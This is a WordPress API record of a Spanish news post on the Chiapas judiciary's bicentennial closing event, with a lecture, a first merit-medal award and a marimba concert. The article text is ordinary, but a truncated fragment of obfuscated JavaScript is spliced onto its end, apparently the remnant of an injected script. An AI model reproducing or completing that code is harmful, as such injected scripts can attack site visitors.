{"id":21676,"date":"2025-05-01T04:32:24","date_gmt":"2025-05-01T04:32:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21676"},"modified":"2025-05-01T04:32:24","modified_gmt":"2025-05-01T04:32:24","slug":"finaliza-poder-judicial-el-ciclo-juridico-y-cultural-que-dio-inicio-a-las-actividades-en-conmemoracion-de-su-bicentenario","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21676","title":{"rendered":"Finaliza Poder Judicial el Ciclo Jur\u00eddico y Cultural que dio inicio a las actividades en conmemoraci\u00f3n de su Bicentenario"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250430-WA0010-1024x681.jpg\" alt=\"\" class=\"wp-image-21677\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250430-WA0010-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250430-WA0010-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250430-WA0010-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250430-WA0010-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250430-WA0010-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250430-WA0010-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u201cDurante todo el a\u00f1o se seguir\u00e1n realizando actividades relevantes para seguir celebrando y conmemorando estos 200 a\u00f1os de justicia en Chiapas\u201d: Juan Carlos Moreno Guill\u00e9n.<\/li>\n<\/ul>\n\n\n\n<p>30 de abril del 2025. En el \u00faltimo d\u00eda del Ciclo Jur\u00eddico y Cultural, el magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, junto a las y los integrantes de la familia judicial, disfrutaron de las actividades que se ten\u00edan programadas para cerrar este ciclo que marc\u00f3 el inicio de la conmemoraci\u00f3n de los 200 a\u00f1os de justicia en Chiapas.<\/p>\n\n\n\n<p>Iniciando estas actividades, el expresidente de la Comisi\u00f3n Nacional de los Derechos Humanos (CNDH), Ra\u00fal Plascencia Villanueva, disert\u00f3 la \u00faltima conferencia magistral denominada \u201cLa prueba de referencia y el razonamiento probatorio\u201d.<\/p>\n\n\n\n<p>En esta conferencia, el magistrado reconoci\u00f3 el aporte que esta conferencia realiz\u00f3: \u201cAgradezco la participaci\u00f3n del doctor Plascencia Villanueva, por compartirnos esta ponencia que afianza el objetivo de esta conmemoraci\u00f3n, y que nos brinda su perspectiva sobre este tema que fortalece el quehacer judicial en Chiapas\u201d, manifest\u00f3 Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>Asimismo, el magistrado presidente Moreno Guill\u00e9n subray\u00f3 que en este Ciclo se brind\u00f3 un espacio de reflexi\u00f3n acad\u00e9mica y el fortalecimiento del conocimiento jur\u00eddico, marcando el cierre de una serie de actividades que reunieron a especialistas, servidoras y servidores, as\u00ed como a la comunidad jur\u00eddica en general, con el objetivo de resaltar la importancia del desarrollo y evoluci\u00f3n de la justicia en nuestra entidad.<\/p>\n\n\n\n<p>Por su parte, el ponente Ra\u00fal Plascencia Villanueva abord\u00f3 aspectos fundamentales del an\u00e1lisis de pruebas indirectas y el papel del razonamiento l\u00f3gico en la construcci\u00f3n de decisiones judiciales s\u00f3lidas, subrayando la relevancia de una adecuada valoraci\u00f3n probatoria en el marco del debido proceso.<\/p>\n\n\n\n<p>Posteriormente, en una emotiva ceremonia, el magistrado presidente Juan Carlos Moreno Guill\u00e9n entreg\u00f3 por primera vez la Medalla de Honor al M\u00e9rito Judicial \u201cLaura Mart\u00ednez Chanona\u201d, un reconocimiento que busca enaltecer la trayectoria, el compromiso y la excelencia en el ejercicio de la funci\u00f3n judicial.<\/p>\n\n\n\n<p>Esta medalla fue instituida como un homenaje permanente a la primera notaria del pa\u00eds y primera magistrada del Poder Judicial del Estado, la destacada Laura Mart\u00ednez Chanona, cuya vida estuvo marcada por su incansable lucha por la justicia, la equidad y los derechos humanos en el \u00e1mbito jur\u00eddico. La primera persona galardonada con esta distinci\u00f3n fue la jueza del Juzgado Primero Familiar de Tuxtla, Norma Acu\u00f1a Vel\u00e1zquez.<\/p>\n\n\n\n<p>Y para cerrar con broche de oro, se present\u00f3 la Marimba Orquesta de la Secretar\u00eda de Seguridad del Pueblo, cuya m\u00fasica tradicional envolvi\u00f3 el recinto judicial y llen\u00f3 de alegr\u00eda a quienes se dieron cita para cerrar este ciclo.<\/p>\n\n\n\n<p>En esta presentaci\u00f3n, entre aplausos, sonrisas y memorias compartidas, el magistrado presidente Juan Carlos Moreno Guill\u00e9n manifest\u00f3 que no s\u00f3lo se conmemoraron dos siglos de existencia, sino tambi\u00e9n de vocaci\u00f3n de servicio, su labor en la sociedad y su compromiso con la impartici\u00f3n de justicia m\u00e1s humanista.<\/p>\n\n\n\n<p>Estuvieron presentes en estas actividades, la magistrada presidenta del Tribunal de Justicia Administrativa, Edna Maritza Morales Bautista; el sobrino de la maestra Laura Mart\u00ednez Chanona, Juan Carlos Calder\u00f3n; as\u00ed como consejeras y consejero de la Judicatura, e integrantes de esta gran familia judicial.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. \u201cDurante todo el a\u00f1o se seguir\u00e1n realizando actividades relevantes para seguir celebrando y conmemorando estos 200 a\u00f1os de justicia en Chiapas\u201d: Juan Carlos Moreno Guill\u00e9n. 30 de abril del 2025. En el \u00faltimo d\u00eda del Ciclo Jur\u00eddico y Cultural, el magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, junto a las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21677,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21676","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21676","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21676"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21676\/revisions"}],"predecessor-version":[{"id":21678,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21676\/revisions\/21678"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21677"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21676"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21676"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21676"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}